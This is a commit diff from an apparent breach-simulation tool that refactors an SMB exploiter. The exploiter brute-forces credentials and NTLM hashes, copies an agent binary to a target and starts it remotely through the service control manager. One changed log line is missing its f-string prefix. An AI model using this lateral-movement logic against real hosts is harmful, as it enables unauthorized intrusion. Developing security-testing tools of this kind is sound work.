forked from p15670423/monkey
Agent: Remove dependency on WormConfig from SmbExploiter
This commit is contained in:
Mike Salvatore
parent
415f3e6468
commit
6fda2691e5
|
|
@ -4,12 +4,13 @@ from impacket.dcerpc.v5 import scmr, transport
|
|||
|
||||
from common.utils.attack_utils import ScanStatus, UsageEnum
|
||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
|
||||
from infection_monkey.exploit.tools.helpers import get_agent_dest_path
|
||||
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
||||
from infection_monkey.model import DROPPER_CMDLINE_DETACHED_WINDOWS, MONKEY_CMDLINE_DETACHED_WINDOWS
|
||||
from infection_monkey.network.tools import check_tcp_port
|
||||
from infection_monkey.network_scanning.smbfinger import SMBFinger
|
||||
from infection_monkey.telemetry.attack.t1035_telem import T1035Telem
|
||||
from infection_monkey.utils.brute_force import generate_brute_force_combinations
|
||||
from infection_monkey.utils.commands import build_monkey_commandline
|
||||
|
||||
logger = getLogger(__name__)
|
||||
|
|
@ -45,14 +46,9 @@ class SmbExploiter(HostExploiter):
|
|||
return False
|
||||
|
||||
def _exploit_host(self):
|
||||
src_path = get_target_monkey(self.host)
|
||||
|
||||
if not src_path:
|
||||
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
||||
return False
|
||||
|
||||
# TODO use infectionmonkey.utils.brute_force
|
||||
creds = self._config.get_exploit_user_password_or_hash_product()
|
||||
agent_binary = self.agent_repository.get_agent_binary(self.host.os["type"])
|
||||
dest_path = get_agent_dest_path(self.host, self.options)
|
||||
creds = generate_brute_force_combinations(self.options["credentials"])
|
||||
|
||||
exploited = False
|
||||
for user, password, lm_hash, ntlm_hash in creds:
|
||||
|
|
@ -60,24 +56,18 @@ class SmbExploiter(HostExploiter):
|
|||
# copy the file remotely using SMB
|
||||
remote_full_path = SmbTools.copy_file(
|
||||
self.host,
|
||||
src_path,
|
||||
self._config.dropper_target_path_win_32,
|
||||
agent_binary,
|
||||
dest_path,
|
||||
user,
|
||||
password,
|
||||
lm_hash,
|
||||
ntlm_hash,
|
||||
self._config.smb_download_timeout,
|
||||
self.options["smb_download_timeout"],
|
||||
)
|
||||
|
||||
if remote_full_path is not None:
|
||||
logger.debug(
|
||||
"Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) "
|
||||
"%s : (SHA-512) %s)",
|
||||
self.host,
|
||||
user,
|
||||
self._config.hash_sensitive_data(password),
|
||||
self._config.hash_sensitive_data(lm_hash),
|
||||
self._config.hash_sensitive_data(ntlm_hash),
|
||||
logger.info(
|
||||
f'Successfully logged in to {self.host.ip_addr} using user "{user}"'
|
||||
)
|
||||
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
||||
self.add_vuln_port(
|
||||
|
|
@ -95,15 +85,8 @@ class SmbExploiter(HostExploiter):
|
|||
|
||||
except Exception as exc:
|
||||
logger.debug(
|
||||
"Exception when trying to copy file using SMB to %r with user:"
|
||||
" %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
|
||||
"SHA-512): %s: (%s)",
|
||||
self.host,
|
||||
user,
|
||||
self._config.hash_sensitive_data(password),
|
||||
self._config.hash_sensitive_data(lm_hash),
|
||||
self._config.hash_sensitive_data(ntlm_hash),
|
||||
exc,
|
||||
"Error when trying to copy file using SMB to {self.host.ip_addr} with user "
|
||||
f'"{user}":{exc}'
|
||||
)
|
||||
continue
|
||||
|
||||
|
|
@ -112,18 +95,18 @@ class SmbExploiter(HostExploiter):
|
|||
return False
|
||||
|
||||
# execute the remote dropper in case the path isn't final
|
||||
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
||||
if remote_full_path.lower() != dest_path.lower():
|
||||
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
|
||||
"dropper_path": remote_full_path
|
||||
} + build_monkey_commandline(
|
||||
self.host,
|
||||
get_monkey_depth() - 1,
|
||||
self._config.dropper_target_path_win_32,
|
||||
self.current_depth - 1,
|
||||
dest_path,
|
||||
)
|
||||
else:
|
||||
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
|
||||
"monkey_path": remote_full_path
|
||||
} + build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||
} + build_monkey_commandline(self.host, self.current_depth - 1)
|
||||
|
||||
smb_conn = False
|
||||
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
|
||||
|
|
@ -153,6 +136,8 @@ class SmbExploiter(HostExploiter):
|
|||
|
||||
if not smb_conn:
|
||||
return False
|
||||
|
||||
# TODO: We DO want to deal with timeouts
|
||||
# We don't wanna deal with timeouts from now on.
|
||||
smb_conn.setTimeout(100000)
|
||||
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
||||
|
|
|
|||
|
|
@ -11,6 +11,7 @@ from common.utils.attack_utils import ScanStatus
|
|||
from infection_monkey.config import Configuration
|
||||
from infection_monkey.network.tools import get_interface_to_target
|
||||
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
||||
from infection_monkey.utils.brute_force import get_credential_string
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
|
@ -28,6 +29,8 @@ class SmbTools(object):
|
|||
timeout=60,
|
||||
):
|
||||
# TODO assess the 60 second timeout
|
||||
creds_for_log = get_credential_string([username, password, lm_hash, ntlm_hash])
|
||||
logger.debug(f"Attempting to copy an agent binary to {host} using SMB with {creds_for_log}")
|
||||
|
||||
smb, dialect = SmbTools.new_smb_connection(
|
||||
host, username, password, lm_hash, ntlm_hash, timeout
|
||||
|
|
|
|||
Loading…
Reference in New Issue